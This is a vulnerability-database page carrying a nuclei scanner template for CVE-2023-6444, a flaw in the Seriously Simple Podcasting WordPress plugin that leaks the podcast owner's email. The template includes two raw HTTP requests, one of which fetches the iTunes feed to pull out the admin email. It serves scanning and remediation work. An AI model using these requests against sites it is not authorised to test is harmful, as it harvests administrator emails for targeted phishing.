Lucene search
K

Seriously Simple Podcasting < 3.0.0 - Information Disclosure

🗓️ 01 Jul 2026 03:36:47Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 20 Views

Seriously Simple Podcasting plugin < 3.0.0 discloses Podcast owner's email address via unauthenticated crafted reques

Related
Refs
Code
id: CVE-2023-6444

info:
  name: Seriously Simple Podcasting < 3.0.0 - Information Disclosure
  author: s4e-io
  severity: medium
  description: |
    The Seriously Simple Podcasting WordPress plugin before 3.0.0 discloses the Podcast owner's email address (which by default is the admin email address) via an unauthenticated crafted request.
  impact: |
    Unauthenticated attackers can send crafted requests to obtain podcast owner email addresses which typically reveal administrator email addresses, enabling targeted phishing attacks.
  remediation: Fixed in 3.0.0
  reference:
    - https://wpscan.com/vulnerability/061c59d6-f4a0-4cd1-b945-5e92b9c2b4aa/
    - https://github.com/Wayne-Ker/CVE-2023-6444-POC/blob/main/cve-2023-6444.py
    - https://nvd.nist.gov/vuln/detail/CVE-2023-6444
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2023-6444
    epss-score: 0.02463
    epss-percentile: 0.82453
    cpe: cpe:2.3:a:seriously_simple_podcasting_plugin:seriously_simple_podcasting_plugin:2:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: castos
    product: seriously-simple-podcasting
    framework: wordpress
    publicwww-query: "/wp-content/plugins/seriously-simple-podcasting/"
  tags: cve,cve2023,wordpress,wp-plugin,exposure,wp,seriously-simple-podcasting,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"/wp-content/plugins/seriously-simple-podcasting")'
          - "status_code == 200"
        condition: and
        internal: true

  - raw:
      - |
        GET /?feed=itunes HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"<itunes:email>","</itunes:email>")'
          - 'contains(content_type,"text/xml")'
          - "status_code == 200"
        condition: and
# digest: 4b0a00483046022100bb689b7592db9e2719fa8bd13198adc8a05b72f728a1f70baf519710de3cfd29022100a8f892803f9ee5126d4d1c58db92f3cb7957cb48c782399a5db5c6cf6a97c3c5:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 3.15.3
EPSS0.02463
SSVC
20